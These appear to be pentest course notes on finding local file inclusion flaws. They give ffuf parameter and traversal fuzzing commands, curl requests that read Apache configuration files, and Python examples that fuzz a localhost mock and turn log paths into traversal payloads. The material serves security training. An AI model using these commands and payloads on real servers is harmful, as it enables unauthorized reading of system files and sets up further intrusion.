
Automated Scanning

  • Use of automated methods (parameter discovery followed by wordlist-based fuzzing) to find LFI vulnerabilities

Fuzzing Parameters

  • Fuzzing for GET parameters (-fs 2287 filters out responses whose size matches the default page, i.e. what the target returns when the parameter is not recognised; measure this baseline on your target before fuzzing)
    • ffuf -w /opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
  • Once we identify an exposed parameter that isn't linked to any forms we tested, we can perform all of the LFI tests discussed in this module. This is not unique to LFI vulnerabilities but also applies to most web vulnerabilities discussed in other modules, as exposed parameters may be vulnerable to any other vulnerability as well.
  • Tip: For a more precise scan, we can limit our scan to the most popular LFI parameters found on this link.

LFI wordlists

  • https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
  • https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt
  • ffuf -w /opt/useful/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287
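The two-stage procedure above (discover exposed parameters by filtering on response size, then throw an LFI wordlist at each hit) as an added example in Python, not part of the original notes. It runs offline against a constructed mock of index.php that is started on localhost; the wordlists, file names and page contents are stand-ins for burp-parameter-names.txt, LFI-Jhaddix.txt and a real target, and the calibration step mimics what ffuf's -fs / -ac options do.

```python
import random
import string
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the target: a 'language' parameter that includes the named
# file (vulnerable by design), and a fixed-size default page for every other request.
FAKE_FS = {
    "en.php": "<p>Welcome</p>",
    "../../../../etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                               "www-data:x:33:33::/var/www:/usr/sbin/nologin\n",
}
DEFAULT_PAGE = "<html><body>" + "<p>default page</p>" * 20 + "</body></html>"
PHP_WARNING = "Warning: include(): failed to open stream"

# Stand-ins for the SecLists wordlists used in the ffuf commands above.
PARAM_WORDS = ["id", "page", "language", "file", "user"]
LFI_WORDS = ["en.php", "../../../../etc/passwd",
             "../../../../etc/shadow", "../../../../nonexistent"]

# Bypass any HTTP_PROXY in the environment so requests really hit the mock server.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


class MockIndexPHP(BaseHTTPRequestHandler):
    def do_GET(self):
        qs = urllib.parse.parse_qs(urllib.parse.urlparse(self.path).query)
        body = DEFAULT_PAGE
        if "language" in qs:
            # Naive include(): a missing file yields a PHP warning instead of the page.
            body = FAKE_FS.get(qs["language"][0], PHP_WARNING)
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_mock_server():
    srv = HTTPServer(("127.0.0.1", 0), MockIndexPHP)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}/index.php"


def response_size(url):
    with OPENER.open(url) as r:
        return len(r.read())


def calibrate(base_url, param=None):
    """Size of a response nothing should match (ffuf -ac): a random parameter name,
    or a random value for a known parameter so 'file not found' pages are filtered too."""
    junk = "".join(random.choices(string.ascii_lowercase, k=12))
    if param is None:
        return response_size(f"{base_url}?{junk}=value")
    return response_size(f"{base_url}?{param}={junk}")


def fuzz(base_url, template, words, baseline):
    """Return the words whose response size differs from the baseline (ffuf -fs)."""
    hits = []
    for w in words:
        url = base_url + "?" + template.replace("FUZZ", urllib.parse.quote(w, safe=""))
        if response_size(url) != baseline:
            hits.append(w)
    return hits


def run_demo():
    """Stage 1: find parameters the app reacts to. Stage 2: LFI-fuzz each of them."""
    srv, base = start_mock_server()
    try:
        params = fuzz(base, "FUZZ=value", PARAM_WORDS, calibrate(base))
        lfi_hits = {p: fuzz(base, f"{p}=FUZZ", LFI_WORDS, calibrate(base, p)) for p in params}
        return params, lfi_hits
    finally:
        srv.shutdown()


if __name__ == "__main__":
    found_params, found_files = run_demo()
    print("exposed parameters:", found_params)
    for p, files in found_files.items():
        print(f"{p}: {files}")
```

The per-parameter calibration in stage 2 matters in practice: a fixed -fs value taken from the default page will not filter the "failed to open stream" response, so every non-existent file in the wordlist shows up as a hit.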

Fuzzing server files

  • The server webroot path, the server configuration files and the server logs are the most useful files to locate, since the exact paths are needed for the later LFI techniques

Server webroot

  • https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt - LINUX
  • https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt - WINDOWS
  • ffuf -w /opt/useful/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287
  • As we can see, the scan did indeed identify the correct webroot path at (/var/www/html/). We may also use the same LFI-Jhaddix.txt wordlist we used earlier, as it also contains various payloads that may reveal the webroot. If this does not help us in identifying the webroot, then our best choice would be to read the server configurations, as they tend to contain the webroot and other important information, as we'll see next.

Server Logs/Configurations

  • https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux
  • https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows
  • ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287
  • This scan returned results that the LFI-Jhaddix.txt wordlist could not
  • Next, read the server configuration file:
    • curl 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/apache2.conf'
  • The configuration shows the log paths, but with an environment variable as prefix (e.g. ErrorLog ${APACHE_LOG_DIR}/error.log), so the file names alone are not enough
  • The variable is defined in /etc/apache2/envvars; read it to obtain the complete paths:
    • curl 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/envvars'
    • Look up the variable (APACHE_LOG_DIR and friends) and substitute it into the paths found above
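Resolving the ${VAR} prefixes from apache2.conf against /etc/apache2/envvars is mechanical, so here it is as an added Python example (not part of the original notes). The three configuration snippets are constructed samples trimmed to the relevant directives; they mirror the default Debian/Ubuntu layout, where SUFFIX is empty and APACHE_LOG_DIR expands to /var/log/apache2. The traversal depth of 4 matches the ../../../../ prefix used in the commands above.

```python
import re

# Constructed sample of what an LFI read of /etc/apache2/apache2.conf returns
# (trimmed to the directives that matter; not a capture from a real target).
APACHE2_CONF = """\
ServerRoot "/etc/apache2"
PidFile ${APACHE_PID_FILE}
ErrorLog ${APACHE_LOG_DIR}/error.log
LogLevel warn
IncludeOptional sites-enabled/*.conf
"""

# Constructed sample of /etc/apache2/sites-enabled/000-default.conf.
SITE_CONF = """\
<VirtualHost *:80>
    DocumentRoot /var/www/html
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
"""

# Constructed sample of /etc/apache2/envvars, trimmed to the assignments.
# On a default install SUFFIX is empty, so APACHE_LOG_DIR becomes /var/log/apache2.
ENVVARS = """\
SUFFIX=
export APACHE_RUN_USER=www-data
export APACHE_RUN_GROUP=www-data
export APACHE_PID_FILE=/var/run/apache2$SUFFIX/apache2.pid
export APACHE_RUN_DIR=/var/run/apache2$SUFFIX
export APACHE_LOCK_DIR=/var/lock/apache2$SUFFIX
export APACHE_LOG_DIR=/var/log/apache2$SUFFIX
"""

# Directives whose first argument is a filesystem path worth reading through the LFI.
PATH_DIRECTIVES = ("ServerRoot", "DocumentRoot", "ErrorLog", "CustomLog", "PidFile")

_ASSIGN = re.compile(r"^\s*(?:export\s+)?([A-Za-z_]\w*)=(.*)$")
_VARREF = re.compile(r"\$(?:\{([A-Za-z_]\w*)\}|([A-Za-z_]\w*))")


def expand(value, env):
    """Expand $VAR and ${VAR}; unset variables expand to '' exactly as sh does."""
    return _VARREF.sub(lambda m: env.get(m.group(1) or m.group(2), ""), value)


def parse_envvars(text):
    """Collect shell assignments in order, expanding each against the earlier ones
    (a later assignment to the same name overrides, as in the real script)."""
    env = {}
    for line in text.splitlines():
        m = _ASSIGN.match(line)
        if m:
            env[m.group(1)] = expand(m.group(2).strip().strip('"\''), env)
    return env


def extract_paths(conf_text, env):
    """Return {directive: [resolved absolute path, ...]} for path-bearing directives."""
    found = {}
    for raw in conf_text.splitlines():
        parts = raw.strip().split()
        if not parts or parts[0].startswith("#"):
            continue
        if parts[0] in PATH_DIRECTIVES and len(parts) > 1:
            path = expand(parts[1].strip('"'), env)
            if path.startswith("/") and path not in found.setdefault(parts[0], []):
                found[parts[0]].append(path)
    return found


def lfi_payload(path, depth=4):
    """Turn an absolute path into the traversal value used with ?language=."""
    return "../" * depth + path.lstrip("/")


def resolve_server_paths(conf_texts=(APACHE2_CONF, SITE_CONF), envvars_text=ENVVARS):
    """Merge the resolved paths from every config file into one directive -> paths map."""
    env = parse_envvars(envvars_text)
    merged = {}
    for conf in conf_texts:
        for directive, values in extract_paths(conf, env).items():
            for p in values:
                if p not in merged.setdefault(directive, []):
                    merged[directive].append(p)
    return merged


if __name__ == "__main__":
    for directive, values in resolve_server_paths().items():
        for p in values:
            print(f"{directive:13s} {p:35s} -> ?language={lfi_payload(p)}")
```

Feed the resulting payloads back through the same ?language= request to confirm each log and config file is actually readable; the log paths are the ones you need for the later log-based techniques.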

LFI tools